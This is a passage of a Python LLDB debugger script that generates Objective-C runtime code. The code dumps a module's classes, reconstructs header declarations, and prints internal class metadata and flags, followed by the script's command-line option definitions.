appendString:(NSString *)[[cls superclass] description]];''' script += r''' [finalString appendString:@"\n\n"]; [finalString appendString:generatedProperties]; [finalString appendString:@"\n"]; [finalString 
appendString:generatedClassMethods]; [finalString appendString:generatedInstanceMethods]; [finalString appendString:@"\n@end"]; [returnString appendString:finalString]; // Free stuff free(properties); returnString; ''' return script def generate_module_header_script(options, modulePath): script = r'''@import @ObjectiveC; //Dang it. LLDB JIT Doesn't like NSString stringWithFormat on device. Need to use stringByAppendingString instead // Runtime declarations in case we're running on a stripped executable typedef struct objc_method *Method; typedef struct objc_ivar *Ivar; // typedef struct objc_category *Category; typedef struct objc_property *objc_property_t; NSMutableString *returnString = [NSMutableString string]; [returnString appendString:@"''' + modulePath + r'''\n************************************************************\n"]; // Properties NSMutableSet *exportedClassesSet = [NSMutableSet set]; NSMutableSet *exportedProtocolsSet = [NSMutableSet set]; unsigned int count = 0; const char **allClasses = (const char **)objc_copyClassNamesForImage("''' + modulePath + r'''", &count); NSMutableDictionary *returnDict = [NSMutableDictionary dictionaryWithCapacity:count]; for (int i = 0; i < count; i++) { Class cls = objc_getClass(allClasses[i]); NSMutableString *generatedProperties = [NSMutableString string]; NSMutableSet *blackListMethodNames = [NSMutableSet set]; [blackListMethodNames addObjectsFromArray:@[@".cxx_destruct", @"dealloc"]]; unsigned int propertyCount = 0; objc_property_t *properties = (objc_property_t *)class_copyPropertyList(cls, &propertyCount); NSCharacterSet *charSet = [NSCharacterSet characterSetWithCharactersInString:@","]; NSString *(^argumentBlock)(NSString *) = ^(NSString *arg) { if ([arg isEqualToString:@"@"]) { return @"id"; } else if ([arg isEqualToString:@"v"]) { return @"void"; } else if ([arg hasPrefix:@"{CGRect"]) { return @"CGRect"; } else if ([arg hasPrefix:@"{CGPoint"]) { return @"CGPoint"; } else if ([arg hasPrefix:@"{CGSize"]) { return @"CGSize"; } else if ([arg isEqualToString:@"q"]) { return @"NSInteger"; } else if ([arg isEqualToString:@"B"]) { return @"BOOL"; } else if ([arg isEqualToString:@":"]) { return @"SEL"; } else if ([arg isEqualToString:@"d"]) { return @"CGFloat"; } else if ([arg isEqualToString:@"@?"]) { // A block? 
return @"id"; } return @"void *"; }; NSMutableSet *blackListPropertyNames = [NSMutableSet setWithArray:@[@"hash", @"superclass", @"class", @"description", @"debugDescription"]]; for (int i = 0; i < propertyCount; i++) { objc_property_t property = properties[i]; NSString *attributes = [NSString stringWithUTF8String:(char *)property_getAttributes(property)]; NSString *name = [NSString stringWithUTF8String:(char *)property_getName(property)]; if ([blackListPropertyNames containsObject:name]) { continue; } NSMutableString *generatedPropertyString = [NSMutableString stringWithString:@"@property ("]; NSScanner *scanner = [[NSScanner alloc] initWithString:attributes]; [scanner setCharactersToBeSkipped:charSet]; BOOL multipleOptions = 0; NSString *propertyType; NSString *parsedInput; while ([scanner scanUpToCharactersFromSet:charSet intoString:&parsedInput]) { if ([parsedInput isEqualToString:@"N"]) { if (multipleOptions) { [generatedPropertyString appendString:@", "]; } [generatedPropertyString appendString:@"nonatomic"]; multipleOptions = 1; } else if ([parsedInput isEqualToString:@"W"]) { if (multipleOptions) { [generatedPropertyString appendString:@", "]; } [generatedPropertyString appendString:@"weak"]; multipleOptions = 1; } else if ([parsedInput hasPrefix:@"G"]) { if (multipleOptions) { [generatedPropertyString appendString:@", "]; } [generatedPropertyString appendString:(NSString *)@"getter="]; [generatedPropertyString appendString:(NSString *)[parsedInput substringFromIndex:1]]; [blackListMethodNames addObject:[parsedInput substringFromIndex:1]]; multipleOptions = 1; } else if ([parsedInput hasPrefix:@"S"]) { if (multipleOptions) { [generatedPropertyString appendString:@", "]; } [generatedPropertyString appendString:(NSString *)@"setter="]; [generatedPropertyString appendString:(NSString *)[parsedInput substringFromIndex:1]]; [blackListMethodNames addObject:[parsedInput substringFromIndex:1]]; multipleOptions = 1; } else if ([parsedInput isEqualToString:@"&"]) { if (multipleOptions) { [generatedPropertyString appendString:@", "]; } [generatedPropertyString appendString:@"strong"]; multipleOptions = 1; } else if ([parsedInput hasPrefix:@"V"]) { // ivar name here, V_name } else if ([parsedInput hasPrefix:@"T"]) { // Type here, T@"NSString" if ( (BOOL)[[[parsedInput substringToIndex:2] substringFromIndex:1] isEqualToString: @"@"]) { // It's a NSObject NSString *tmpPropertyType = [parsedInput substringFromIndex:1]; NSArray *propertyComponents = [tmpPropertyType componentsSeparatedByString:@"\""]; if ([propertyComponents count] > 1) { NSString *component = (NSString *)[propertyComponents objectAtIndex:1]; component = [component stringByReplacingOccurrencesOfString:@"><" withString:@", "]; if ([component hasPrefix:@"<"]) { propertyType = (NSString *)[@"id" stringByAppendingString:component]; NSString *formatted = [[component stringByReplacingOccurrencesOfString:@"<" withString:@""] stringByReplacingOccurrencesOfString:@">" withString:@""]; for (NSString *f in [formatted componentsSeparatedByString:@", "]) { [exportedProtocolsSet addObject:f]; } } else { [exportedClassesSet addObject:component]; propertyType = (NSString *)[component stringByAppendingString:@"*"]; } } else { propertyType = @"id"; } } else { propertyType = argumentBlock([parsedInput substringFromIndex:1]); } } } [generatedPropertyString appendString:(NSString *)[(NSString *)[(NSString *)[(NSString *)[@") " stringByAppendingString:propertyType] stringByAppendingString:@" "] stringByAppendingString:name] 
stringByAppendingString:@";\n"]]; [generatedProperties appendString:generatedPropertyString]; [blackListMethodNames addObject:name]; } NSMutableArray *tmpSetArray = [NSMutableArray array]; for (NSString *propertyName in [blackListMethodNames allObjects]) { NSString *setter = (NSString *)[@"set" stringByAppendingString:(NSString *)[(NSString *)[(NSString *)[[propertyName substringToIndex:1] uppercaseString] stringByAppendingString:[propertyName substringFromIndex:1]] stringByAppendingString:@":"]]; [tmpSetArray addObject:setter]; } [blackListMethodNames addObjectsFromArray:tmpSetArray]; NSString *(^generateMethodsForClass)(Class) = ^(Class cls) { NSMutableString* generatedMethods = [NSMutableString stringWithString:@""]; unsigned int classCount = 0; Method *methods = (Method *)class_copyMethodList(cls, &classCount); NSString *classOrInstanceStart = (BOOL)class_isMetaClass(cls) ? @"+" : @"-"; for (int i = 0; i < classCount; i++) { Method m = methods[i]; NSString *methodName = NSStringFromSelector((char *)method_getName(m)); if ([blackListMethodNames containsObject:methodName]) { continue; } NSMutableString *generatedMethodString = [NSMutableString stringWithString:classOrInstanceStart]; char *retType = (char *)method_copyReturnType(m); NSString *retTypeString = [NSString stringWithUTF8String:retType]; free(retType); unsigned int arguments = (unsigned int)method_getNumberOfArguments(m); [generatedMethodString appendString:(NSString *)[(NSString *)[@"(" stringByAppendingString:argumentBlock(retTypeString)] stringByAppendingString:@")"]]; NSArray *methodComponents = [methodName componentsSeparatedByString:@":"]; NSMutableString *realizedMethod = [NSMutableString stringWithString:@""]; for (int j = 2; j < arguments; j++) { // id, sel, always int index = j - 2; [realizedMethod appendString:(NSString *)[methodComponents[index] stringByAppendingString:@":"]]; char *argumentType = (char *)method_copyArgumentType(m, j); NSString *argumentTypeString = [NSString stringWithUTF8String:argumentType]; free(argumentType); [realizedMethod appendString:(NSString *)[(NSString *)[@"(" stringByAppendingString:argumentBlock(argumentTypeString)] stringByAppendingString:@")"]]; [realizedMethod appendString:@"arg"]; [realizedMethod appendString:[@(index) stringValue]]; [realizedMethod appendString:@" "]; } [generatedMethodString appendString:realizedMethod]; if (arguments == 2) { [generatedMethodString appendString:methodName]; } [generatedMethods appendString:(NSString *)[generatedMethodString stringByAppendingString:@";\n"]]; } free(methods); return generatedMethods; }; // Instance Methods NSString *generatedInstanceMethods = generateMethodsForClass((Class)cls); // Class Methods Class metaClass = (Class)objc_getMetaClass((char *)class_getName(cls)); NSString *generatedClassMethods = generateMethodsForClass(metaClass); NSMutableString *finalString = [NSMutableString string]; [finalString appendString:(NSString *)[cls description]]; [finalString appendString:@" : "]; [finalString appendString:(NSString *)[[cls superclass] description]]; [finalString appendString:(NSString *)[[[generatedProperties componentsSeparatedByString:@"\n"] sortedArrayUsingSelector:@selector(compare:)] componentsJoinedByString:@"\n "]]; [finalString appendString:(NSString *)[[[[generatedClassMethods stringByReplacingOccurrencesOfString:@" ;" withString:@";"] componentsSeparatedByString:@"\n"] sortedArrayUsingSelector:@selector(compare:)] componentsJoinedByString:@"\n "]]; [finalString appendString:(NSString *)[[[[generatedInstanceMethods 
stringByReplacingOccurrencesOfString:@" ;" withString:@";"] componentsSeparatedByString:@"\n"] sortedArrayUsingSelector:@selector(compare:)] componentsJoinedByString:@"\n "]]; [finalString appendString:@"\n************************************************************\n"]; [returnDict setObject:(id _Nonnull)finalString forKey:(id _Nonnull)[cls description]]; // Free stuff free(properties); } NSArray *sortedKeys = [[returnDict allKeys] sortedArrayUsingSelector: @selector(compare:)]; NSMutableArray *sortedValues = [NSMutableArray array]; for (NSString *key in sortedKeys) { [returnString appendString:(NSString *)[returnDict objectForKey:key]]; } returnString; ''' return script def generate_class_info(options): if options.verbose_info and not options.info: options.info = options.verbose_info verboseOutput = True else: verboseOutput = False if '.' in options.info: classInfo = "(Class)NSClassFromString(@\"" + options.info + "\")" else: classInfo = "[" + options.info + " class]" script = "BOOL verboseOutput = {};\n".format("YES" if verboseOutput else "NO") script += r''' @import Foundation; @import ObjectiveC; #define RO_META (1<<0) // class is a root class #define RO_ROOT (1<<1) // class has .cxx_construct/destruct implementations #define RO_HAS_CXX_STRUCTORS (1<<2) // class has +load implementation // #define RO_HAS_LOAD_METHOD (1<<3) // class has visibility=hidden set #define RO_HIDDEN (1<<4) // class has attribute(objc_exception): OBJC_EHTYPE_$_ThisClass is non-weak #define RO_EXCEPTION (1<<5) // this bit is available for reassignment // #define RO_REUSE_ME (1<<6) // class compiled with ARC #define RO_IS_ARC (1<<7) // class has .cxx_destruct but no .cxx_construct (with RO_HAS_CXX_STRUCTORS) #define RO_HAS_CXX_DTOR_ONLY (1<<8) // class is not ARC but has ARC-style weak ivar layout #define RO_HAS_WEAK_WITHOUT_ARC (1<<9) // class is in an unloadable bundle - must never be set by compiler #define RO_FROM_BUNDLE (1<<29) // class is unrealized future class - must never be set by compiler #define RO_FUTURE (1<<30) // class is realized - must never be set by compiler #define RO_REALIZED (1<<31) // Values for class_rw_t->flags // These are not emitted by the compiler and are never used in class_ro_t. // Their presence should be considered in future ABI versions. // class_t->data is class_rw_t, not class_ro_t #define RW_REALIZED (1<<31) // class is unresolved future class #define RW_FUTURE (1<<30) // class is initialized #define RW_INITIALIZED (1<<29) // class is initializing #define RW_INITIALIZING (1<<28) // class_rw_t->ro is heap copy of class_ro_t #define RW_COPIED_RO (1<<27) // class allocated but not yet registered #define RW_CONSTRUCTING (1<<26) // class allocated and registered #define RW_CONSTRUCTED (1<<25) // available for use; was RW_FINALIZE_ON_MAIN_THREAD // #define RW_24 (1<<24) // class +load has been called #define RW_LOADED (1<<23) #if !SUPPORT_NONPOINTER_ISA // class instances may have associative references #define RW_INSTANCES_HAVE_ASSOCIATED_OBJECTS (1<<22) #endif // class has instance-specific GC layout #define RW_HAS_INSTANCE_SPECIFIC_LAYOUT (1 << 21) // available for use // #define RW_20 (1<<20) // class has started realizing but not yet completed it #define RW_REALIZING (1<<19) // NOTE: MORE RW_ FLAGS DEFINED BELOW // Values for class_rw_t->flags or class_t->bits // These flags are optimized for retain/release and alloc/dealloc // 64-bit stores more of them in class_t->bits to reduce pointer indirection. 
#if !__LP64__ // class or superclass has .cxx_construct implementation #define RW_HAS_CXX_CTOR (1<<18) // class or superclass has .cxx_destruct implementation #define RW_HAS_CXX_DTOR (1<<17) // class or superclass has default alloc/allocWithZone: implementation // Note this is is stored in the metaclass. #define RW_HAS_DEFAULT_AWZ (1<<16) // class's instances requires raw isa #if SUPPORT_NONPOINTER_ISA #define RW_REQUIRES_RAW_ISA (1<<15) #endif // class is a Swift class #define FAST_IS_SWIFT (1UL<<0) // class or superclass has default retain/release/autorelease/retainCount/ // _tryRetain/_isDeallocating/retainWeakReference/allowsWeakReference #define FAST_HAS_DEFAULT_RR (1UL<<1) // data pointer #define FAST_DATA_MASK 0xfffffffcUL #elif 1 // Leaks-compatible version that steals low bits only. // class or superclass has .cxx_construct implementation #define RW_HAS_CXX_CTOR (1<<18) // class or superclass has .cxx_destruct implementation #define RW_HAS_CXX_DTOR (1<<17) // class or superclass has default alloc/allocWithZone: implementation // Note this is is stored in the metaclass. #define RW_HAS_DEFAULT_AWZ (1<<16) // class is a Swift class #define FAST_IS_SWIFT (1UL<<0) // class or superclass has default retain/release/autorelease/retainCount/ // _tryRetain/_isDeallocating/retainWeakReference/allowsWeakReference #define FAST_HAS_DEFAULT_RR (1UL<<1) // class's instances requires raw isa #define FAST_REQUIRES_RAW_ISA (1UL<<2) // data pointer #define FAST_DATA_MASK 0x00007ffffffffff8UL #else // Leaks-incompatible version that steals lots of bits. // class is a Swift class #define FAST_IS_SWIFT (1UL<<0) // class's instances requires raw isa #define FAST_REQUIRES_RAW_ISA (1UL<<1) // class or superclass has .cxx_destruct implementation // This bit is aligned with isa_t->hasCxxDtor to save an instruction. #define FAST_HAS_CXX_DTOR (1UL<<2) // data pointer #define FAST_DATA_MASK 0x00007ffffffffff8UL // class or superclass has .cxx_construct implementation #define FAST_HAS_CXX_CTOR (1UL<<47) // class or superclass has default alloc/allocWithZone: implementation // Note this is is stored in the metaclass. #define FAST_HAS_DEFAULT_AWZ (1UL<<48) // class or superclass has default retain/release/autorelease/retainCount/ // _tryRetain/_isDeallocating/retainWeakReference/allowsWeakReference #define FAST_HAS_DEFAULT_RR (1UL<<49) // summary bit for fast alloc path: !hasCxxCtor and // !instancesRequireRawIsa and instanceSize fits into shiftedSize #define FAST_ALLOC (1UL<<50) // instance size in units of 16 bytes // or 0 if the instance size is too big in this field // This field must be LAST #define FAST_SHIFTED_SIZE_SHIFT 51 // FAST_ALLOC means // FAST_HAS_CXX_CTOR is set // FAST_REQUIRES_RAW_ISA is not set // FAST_SHIFTED_SIZE is not zero // FAST_ALLOC does NOT check FAST_HAS_DEFAULT_AWZ because that // bit is stored on the metaclass. 
#define FAST_ALLOC_MASK (FAST_HAS_CXX_CTOR | FAST_REQUIRES_RAW_ISA) #define FAST_ALLOC_VALUE (0) #endif #ifndef _DLFCN_H_ typedef struct dl_info { const char *dli_fname; /* Pathname of shared object */ void *dli_fbase; /* Base address of shared object */ const char *dli_sname; /* Name of nearest symbol */ void *dli_saddr; /* Address of nearest symbol */ } Dl_info; #endif // _DLFCN_H_ //*****************************************************************************/ #pragma mark - Methods //*****************************************************************************/ typedef struct method_t { char * name; const char *types; IMP imp; } method_t; typedef struct method_list_t { uint32_t entsizeAndFlags; uint32_t count; method_t *first; } method_list_t; typedef struct method_array_t { uint32_t count; method_list_t *methods; } method_array_t; //*****************************************************************************/ #pragma mark - Ivars //*****************************************************************************/ typedef struct ivar_t { #if __x86_64__ // *offset was originally 64-bit on some x86_64 platforms. // We read and write only 32 bits of it. // Some metadata provides all 64 bits. This is harmless for unsigned // little-endian values. // Some code uses all 64 bits. class_addIvar() over-allocates the // offset for their benefit. #endif int32_t *offset; const char *name; const char *type; // alignment is sometimes -1; use alignment() instead uint32_t alignment_raw; uint32_t size; } ivar_t; typedef struct ivar_list_t { uint32_t entsizeAndFlags; uint32_t count; ivar_t *first; } ivar_list_t; //*****************************************************************************/ #pragma mark - Properties //*****************************************************************************/ typedef struct property_t { const char *name; const char *attributes; } property_t; typedef struct property_list_t { uint32_t entsizeAndFlags; uint32_t count; property_t *first; } property_list_t; typedef struct property_array_t { uint32_t count; property_list_t *properties; } property_array_t; //*****************************************************************************/ #pragma mark - Protocols //*****************************************************************************/ typedef struct dsprotocol_t { uint32_t flags; uint32_t version; const char *name; // struct protocol_list_t *protocols; // method_list_t *instanceMethods; // method_list_t *classMethods; // method_list_t *optionalInstanceMethods; // method_list_t *optionalClassMethods; // property_list_t *instanceProperties; // uint32_t size; // sizeof(protocol_t) // uint32_t flags; // // Fields below this point are not always present on disk. 
// const char **_extendedMethodTypes; // const char *_demangledName; // property_list_t *_classProperties; } dsprotocol_t; typedef struct protocol_list_t { uintptr_t count; dsprotocol_t *first; } protocol_list_t; typedef struct protocol_array_t { uint32_t count; protocol_list_t *protocols; } protocol_array_t; //*****************************************************************************/ #pragma mark - Categories //*****************************************************************************/ typedef struct class_ro_t { uint32_t flags; uint32_t instanceStart; uint32_t instanceSize; #ifdef __LP64__ uint32_t reserved; #endif const uint8_t * ivarLayout; const char * name; method_list_t * baseMethodList; protocol_list_t * baseProtocols; ivar_list_t * ivars; uint8_t * weakIvarLayout; property_list_t *baseProperties; } class_ro_t; typedef struct class_rw_t { uint32_t flags; uint32_t version; const class_ro_t *ro; method_array_t methods; // redefined from method_array_t property_array_t properties; // redefined from property_array_t protocol_list_t protocols; // redefined from protocol_array_t struct dsobjc_class* firstSubclass; struct dsobjc_class* nextSiblingClass; char *demangledName; } class_rw_t; typedef struct dsobjc_class { struct dsobjc_class* isa; struct dsobjc_class* superclass; void *_buckets; // formerly cache pointer and vtable uint32_t _mask; uint32_t _occupied; uintptr_t bits; class_rw_t *ds_data() { return (class_rw_t *)(bits & FAST_DATA_MASK); } } dsobjc_class; typedef struct dsswift_class { struct dsobjc_class *isa; struct dsobjc_class *superclass; void *_buckets; void *maskAndOccupied; uintptr_t bits; uint32_t flags; uint32_t instanceAddressPoint; uint32_t instanceSize; uint16_t instanceAlignMask; uint16_t runtimeReservedBits; uint32_t classSize; uint32_t classAddressPoint; uintptr_t typeDescriptor; uintptr_t ivarDestroyer; uintptr_t *methods; class_rw_t *ds_data() { return (class_rw_t *)(bits & FAST_DATA_MASK); } } dsswift_class; dsobjc_class *dsclass = (dsobjc_class*)''' + classInfo + r'''; dsobjc_class *dsclass_meta = (dsobjc_class*)object_getClass((Class)dsclass); uint32_t roflags = dsclass->ds_data()->ro->flags; uint32_t rwflags = dsclass->ds_data()->flags; const char* name = dsclass->ds_data()->ro->name; const char* superclassName = dsclass->superclass ? 
dsclass->superclass->ds_data()->ro->name : nil; property_list_t *bprops = dsclass->ds_data()->ro->baseProperties; protocol_list_t *bprot = dsclass->ds_data()->ro->baseProtocols; method_list_t *bmeth = dsclass->ds_data()->ro->baseMethodList; ivar_list_t *bivar = dsclass->ds_data()->ro->ivars; NSMutableString *returnString = [NSMutableString new]; if (verboseOutput) { [returnString appendString:@"\n******************************************\n"]; [returnString appendString:@" "]; [returnString appendString:[NSString stringWithUTF8String:(char *)name]]; if (superclassName && (roflags & RO_META)) { [returnString appendString:@" : (META)"]; } else if (superclassName) { [returnString appendString:@" : "]; [returnString appendString:[NSString stringWithUTF8String:(char *)superclassName]]; } [returnString appendString:(NSString*)[[NSString alloc] initWithFormat:@" (%p)", dsclass]]; [returnString appendString:@"\n******************************************\n\n"]; [returnString appendString:@"Found in: "]; [returnString appendString:[NSString stringWithUTF8String:(char *)class_getImageName((Class)dsclass)]]; [returnString appendString:@"\n\n"]; [returnString appendString:@"Swift:\t\t\t"]; [returnString appendString:dsclass->bits & FAST_IS_SWIFT ? @"YES\n" : @"NO\n" ]; [returnString appendString:@"Size:\t\t\t"]; [returnString appendString:(NSString*)[[NSString alloc] initWithFormat:@"0x%x bytes", dsclass->ds_data()->ro->instanceSize]]; [returnString appendString:(NSString*)[[NSString alloc] initWithFormat:@"\nInstance Start:\t0x%x", dsclass->ds_data()->ro->instanceStart]]; [returnString appendString:@"\nMeta:\t\t\t"]; [returnString appendString:(BOOL)class_isMetaClass((Class)dsclass) ? @"YES" : @"NO"];; [returnString appendString:@"\n\n"]; /////////////////////////////////////////////////////////////////// [returnString appendString:@"Protocols: "]; [returnString appendString:(NSString*)[[NSString alloc] initWithFormat:@"\t\t%d\t%p\n", bprot ? bprot->count : 0, bprot ? &bprot->first : 0]]; [returnString appendString:@"Ivars: "]; [returnString appendString:(NSString*)[[NSString alloc] initWithFormat:@"\t\t\t%d\t%p\n", bivar ? bivar->count : 0, bivar ? &bivar->first : 0]]; [returnString appendString:@"Properties: "]; [returnString appendString:(NSString*)[[NSString alloc] initWithFormat:@"\t%d\t%p\n", bprops ? bprops->count : 0, bprops ? &bprops->first : 0]]; if (!(roflags & RO_META)) { [returnString appendString:@"I ObjC Meth: "]; } else { [returnString appendString:@"C ObjC Meth: "]; } [returnString appendString:(NSString*)[[NSString alloc] initWithFormat:@"\t%d\t%p\n", bmeth ? bmeth->count : 0, bmeth ? &bmeth->first : 0]]; if (!(roflags & RO_META) && NSClassFromString(@"UIView") && dsclass_meta) { // Cocoa's isa layout is different? method_list_t *classmeth = dsclass_meta->ds_data()->ro->baseMethodList; [returnString appendString:@"C ObjC Meth: "]; [returnString appendString:(NSString*)[[NSString alloc] initWithFormat:@"\t%d\t%p\n", classmeth ? classmeth->count : 0, classmeth ? &classmeth->first : 0]]; } /////////////////////////////////////////////////////////////////// [returnString appendString:@"\nRW Flags:\n"]; [returnString appendString:@" "]; [returnString appendString:(rwflags & RW_REALIZED) ? @"1" : @"0"]; [returnString appendString:@"\tRW_REALIZED\t\t\tclass is realized\n"]; [returnString appendString:@" "]; [returnString appendString:(rwflags & RW_FUTURE) ? 
@"1" : @"0"]; [returnString appendString:@"\tRW_FUTURE\t\t\tclass is unresolved future class\n"]; [returnString appendString:@" "]; [returnString appendString:(rwflags & RW_INITIALIZED) ? @"1" : @"0"]; [returnString appendString:@"\tRW_INITIALIZED\t\tclass is initialized\n"]; [returnString appendString:@" "]; [returnString appendString:(rwflags & RW_INITIALIZING) ? @"1" : @"0"]; [returnString appendString:@"\tRW_INITIALIZING\t\tclass is initializing\n"]; [returnString appendString:@" "]; [returnString appendString:(rwflags & RW_COPIED_RO) ? @"1" : @"0"]; [returnString appendString:@"\tRW_COPIED_RO\t\tclass_rw_t->ro is heap copy of class_ro_t\n"]; [returnString appendString:@" "]; [returnString appendString:(rwflags & RW_CONSTRUCTING) ? @"1" : @"0"]; [returnString appendString:@"\tRW_CONSTRUCTING\t\tclass allocated but not yet registered\n"]; [returnString appendString:@" "]; [returnString appendString:(rwflags & RW_CONSTRUCTED) ? @"1" : @"0"]; [returnString appendString:@"\tRW_CONSTRUCTED\t\tclass allocated and registered\n"]; [returnString appendString:@" "]; [returnString appendString:(rwflags & RW_LOADED) ? @"1" : @"0"]; [returnString appendString:@"\tRW_LOADED\t\t\tclass +load has been called\n"]; ///////////////////////////////////////////////////////////////////// [returnString appendString:@"\nRO Flags:\n"]; [returnString appendString:@" "]; [returnString appendString:(roflags & RO_META) ? @"1" : @"0"]; [returnString appendString:@"\tRO_META\t\t\t\tclass is a metaclass\n"]; [returnString appendString:@" "]; [returnString appendString: roflags & RO_ROOT ? @"1" : @"0"]; [returnString appendString:@"\tRO_ROOT\t\t\t\tclass is a root class\n"]; [returnString appendString:@" "]; [returnString appendString: roflags & RO_HAS_CXX_STRUCTORS ? @"1" : @"0"]; [returnString appendString:@"\tRO_HAS_CXX_STRUCTORS\tclass has .cxx_construct/destruct implementations\n"]; [returnString appendString:@" "]; [returnString appendString: roflags & RO_HIDDEN ? @"1": @"0"]; [returnString appendString:@"\tRO_HIDDEN\t\t\t\tclass has visibility=hidden set\n"]; [returnString appendString:@" "]; [returnString appendString:roflags & RO_EXCEPTION ? @"1" : @"0"]; [returnString appendString:@"\tRO_EXCEPTION\t\t\tclass has attribute(objc_exception): OBJC_EHTYPE_$_ThisClass is non-weak\n"]; [returnString appendString:@" "]; [returnString appendString:roflags & RO_IS_ARC ? @"1" : @"0"]; [returnString appendString:@"\tRO_IS_ARC\t\t\t\tclass compiled with ARC\n"]; [returnString appendString:@" "]; [returnString appendString:roflags & RO_HAS_CXX_DTOR_ONLY ? @"1" : @"0"]; [returnString appendString:@"\tRO_HAS_CXX_DTOR_ONLY\tclass has .cxx_destruct but no .cxx_construct (with RO_HAS_CXX_STRUCTORS)\n"]; [returnString appendString:@" "]; [returnString appendString:roflags & RO_HAS_WEAK_WITHOUT_ARC ? @"1" : @"0"]; [returnString appendString:@"\tRO_HAS_WEAK_WITHOUT_ARC\tclass is not ARC but has ARC-style weak ivar layout\n"]; [returnString appendString:@" "]; [returnString appendString:roflags & RO_FROM_BUNDLE ? @"1" : @"0"]; [returnString appendString:@"\tRO_FROM_BUNDLE\t\tclass is in an unloadable bundle - must never be set by compiler\n"]; [returnString appendString:@" "]; [returnString appendFormat:roflags & RO_FUTURE ? @"1" : @"0"]; [returnString appendFormat:@"\tRO_FUTURE\t\t\tclass is unrealized future class - must never be set by compiler\n"]; [returnString appendString:@" "]; [returnString appendFormat:roflags & RO_REALIZED ? 
@"1" : @"0"]; [returnString appendFormat:@"\tRO_REALIZED\t\t\tclass is realized - must never be set by compiler\n"]; } [returnString appendFormat:@"\n@interface "]; [returnString appendString:[NSString stringWithUTF8String:(char *)name]]; [returnString appendString:@" : "]; if (superclassName) { [returnString appendString:[NSString stringWithUTF8String:(char *)superclassName]]; } if (bprot) { [returnString appendString:@" <"]; for (int i = 0; i < bprot->count; i++) { dsprotocol_t **pp = (&bprot->first); [returnString appendString:(NSString*)[[NSString alloc] initWithFormat:@"%s", pp[i]->name]]; if (i < (bprot->count - 1)) { [returnString appendString:@", "]; } } [returnString appendString:@">"]; } [returnString appendString:@"\n{\n"]; if (bivar) { for (int i = 0; i < bivar->count; i++) { ivar_t *dsiv = (ivar_t *)(&bivar->first); [returnString appendString:(NSString*)[[NSString alloc] initWithFormat:@" %20s %-30s; offset 0x%x, 0x%x\n", (char *)dsiv[i].type, (char *)dsiv[i].name, *(int32_t *)dsiv[i].offset, (int)dsiv[i].size]]; } } [returnString appendString:@"}\n\n"]; if (bprops) { for (int i = 0; i < bprops->count; i++) { property_t *dsiv = (property_t *)(&bprops->first); [returnString appendString:@"@property "]; [returnString appendString:[NSString stringWithUTF8String:(char *)dsiv[i].attributes]]; [returnString appendString:@" *"]; [returnString appendString:[NSString stringWithUTF8String:(char *)dsiv[i].name]]; [returnString appendString:@"\n"]; } } [returnString appendString:@"\n"]; if (bmeth) { for (int i = 0; i < bmeth->count; i++) { NSString *methodType = (BOOL)class_isMetaClass((Class)dsclass) ? @"+" : @"-"; method_t *mt = (method_t*)(&bmeth->first); [returnString appendString:(NSString*)[[NSString alloc] initWithFormat:@" %s%40s %p\n", [methodType UTF8String], mt[i].name, mt[i].imp]]; } if ((BOOL)class_isMetaClass((Class)dsclass) == NO) { dsobjc_class* dsmetaclass = (dsobjc_class*)objc_getMetaClass(name); method_list_t *bmetameth = dsmetaclass->ds_data()->ro->baseMethodList; if (bmetameth) { for (int i = 0; i < bmetameth->count; i++) { NSString *methodType = (BOOL)class_isMetaClass((Class)dsmetaclass) ? @"+" : @"-"; method_t *mt = (method_t*)(&bmetameth->first); [returnString appendString:(NSString*)[[NSString alloc] initWithFormat:@" %s%40s %p\n", [methodType UTF8String], mt[i].name, mt[i].imp]]; } } } } if (!(roflags & RO_META) && NSClassFromString(@"UIView") && dsclass_meta) { // Cocoa's isa is different? 
TODO method_list_t *classmeth = dsclass_meta->ds_data()->ro->baseMethodList; if (classmeth) { for (int i = 0; i < classmeth->count; i++) { method_t *mt = (method_t*)(&classmeth->first); [returnString appendString:(NSString*)[[NSString alloc] initWithFormat:@" +%40s %p\n", mt[i].name, mt[i].imp]]; } } } if (dsclass->bits & FAST_IS_SWIFT) { dsswift_class *dsswiftcls = (dsswift_class*)dsclass; unsigned long methodsAddress = (unsigned long)&dsswiftcls->methods; unsigned long endAddress = (unsigned long)dsswiftcls + dsswiftcls->classSize - dsswiftcls->classAddressPoint; int methodCount = ((int)(endAddress - methodsAddress)) / sizeof(uintptr_t*); [returnString appendString:(NSString*)[[NSString alloc] initWithFormat:@"Swift methods: %d\n", methodCount]]; for (int i = 0; i < methodCount; i++) { uintptr_t * ptr = (uintptr_t*)methodsAddress; Dl_info dsinfo = {}; dladdr((void*)ptr[i], (Dl_info *)&dsinfo); [returnString appendString:(NSString*)[[NSString alloc] initWithFormat:@"(%p) %s\n", ptr[i], dsinfo.dli_sname]]; } } [returnString appendString:@"\n"]; [returnString appendString:@"@end\n"]; returnString; ''' return script def generate_option_parser(): usage = "usage: %prog [options] /optional/path/to/executable/or/bundle" parser = optparse.OptionParser(usage=usage, prog="dump_classes") parser.add_option("-f", "--filter", action="store", default=None, dest="filter", help="List all the classes in the module that are subclasses of class. -f UIView") parser.add_option("-m", "--module", action="store", default=None, dest="module", help="Filter class by module. You only need to give the module name and not fullpath") parser.add_option("-r", "--regular_expression", action="store", default=None, dest="regular_expression", help="Search the available classes using a regular expression search") parser.add_option("-t", "--class_type", action="store", default=None, dest="class_type", help="Specifies the class type, only supports \"objc\" or \"swift\"") parser.add_option("-v", "--verbose", action="store_true", default=False, dest="verbose", help="Enables verbose mode for dumping classes. Doesn't work w/ -g or -p") parser.add_option("-g", "--generate_header", action="store_true", default=False, dest="generate_header", help="Generate a header for the specified class. -h UIView") parser.add_option("-P", "--generate_protocol", action="store_true", default=False, dest="generate_protocol", help="Generate a protocol that you can cast to any object") parser.add_option("-o", "--dump_code_output", action="store_true", default=False, dest="dump_code_output", help="Dump all classes and code per module, use \"__all\" to dump all ObjC modules known to proc") parser.add_option("-l", "--search_protocols", action="store_true", default=False, dest="search_protocols", help="Search for protocols instead of ObjC classes") parser.add_option("-p", "--conforms_to_protocol", action="store", default=None, dest="conforms_to_protocol", help="Only returns the classes that conforms to a particular protocol") parser.add_option("-s", "--superclass", action="store", default=None, dest="superclass", help="Returns only if the parent class is of type") parser.add_option("-i", "--info", action="store", default=None, dest="info", help="Get the info about a Objectie-C class, i.e. dclass -i UIViewController") parser.add_option("-I", "--verbose_info", action="store", default=None, dest="verbose_info", help="Get the info about a Objectie-C class, i.e. 
